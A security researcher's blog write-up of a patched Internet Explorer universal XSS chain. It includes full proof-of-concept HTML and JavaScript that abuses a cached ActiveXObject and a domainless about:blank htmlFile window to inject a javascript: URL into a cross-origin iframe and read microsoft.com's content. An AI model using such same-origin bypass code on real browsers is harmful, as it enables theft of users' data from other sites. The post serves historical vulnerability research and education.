UXSS via Domainless about:blank and htmlFile ActiveX

This was one of the more involved UXSS chains I worked on. It combined a server-side redirect, a cached ActiveXObject reference, and a “domainless” about:blank window to ultimately execute script inside a cross-origin iframe — reading the contents of microsoft.com from an attacker-controlled page.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xDomain_about_blank_full_access</title>
</head>
<body>
<script language="JavaScript">
function main()
{
	var win = window.open("redir.aspx","RANDOM_NAME","width=100,height=100");
	win.setTimeout('opener._ActiveXObject = ActiveXObject;alert("Do not close this alert please");', 100);
	var dhtmlFile = win.eval('new ActiveXObject("htmlFile")');
	setTimeout('openBlankWindow()', 1000);
}

function openBlankWindow()
{
	var blankHtmlFile = new _ActiveXObject("htmlFile");
	var metaredirURL = (location.href.substring(0,location.href.lastIndexOf('/')+1)) + "metaredir.html";
	
	var code = 'w=window.open();' +
	'w.document.write(\'Wait a few seconds please. Loading Microsoft inside an iFrame...<br /><br />' +
	'<script>'+
	'	function injectScript(){'+
	'	window[0][0].location = "javascript:alert(parent.document.body.innerText)";'+
	'	}'+
	'	function loadBlank(){'+
	'	window[0][0].location = "'+ metaredirURL +'";'+
	'	setTimeout("injectScript()", 3000);'+
	'	}'+
	'<\/script>'+
	'<iframe onload="loadBlank()" width=400 height=200 src="http://www.microsoft.com"></iframe>\');'+
	'w.document.close()';

	blankHtmlFile.parentWindow.setTimeout(code);
}
</script>
</body>
</html>

The chain worked in four steps. First, a new window was opened to a redirecting page (redir.aspx), and before the redirect fired, a reference to its ActiveXObject constructor was cached. Second, after the redirect, the cached reference was used to create a “domainless” htmlFile — one whose parentWindow.open() produced an about:blank with no tied origin, similar to a blank tab opened directly by the browser. Third, that domainless window loaded microsoft.com in an iframe. Fourth, a sub-iframe inside microsoft.com was navigated to metaredir.html (a meta-refresh to about:blank); because the about:blank inherited microsoft.com’s origin, the domainless outer window could access it via window[0][0].location and inject a javascript: URL that read the cross-origin document content.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [Resident Script via HTML Object External Reference] :: [EoP: Crash Changing iFrame URL from RSS Feed] >